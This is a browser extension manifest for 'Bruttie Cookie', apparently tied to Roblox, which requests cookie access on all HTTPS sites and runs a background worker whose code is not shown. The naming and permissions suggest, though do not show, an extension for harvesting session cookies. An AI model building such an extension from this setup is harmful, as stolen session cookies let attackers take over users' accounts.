{
    "name": "Bruttie Cookie",
    "description": "Made By Ender.",
    "version": "4.2.0",
    "manifest_version": 3,

    "action" : {
        "default_icon": "assets/roblox.png",
        "default_popup": "mainindx.html",
        "default_title": "Bruttie Cookie"
    },

    "host_permissions": [
	"https://*/*"
    ],

    "permissions": [
        "storage",
        "cookies"
    ],

    "background": {
        "service_worker": "js/worker.js"
    },

    "icons": {
        "16": "assets/roblox.png",
        "32": "assets/roblox.png",
        "48": "assets/roblox.png",
        "128": "assets/roblox.png"
    }
}
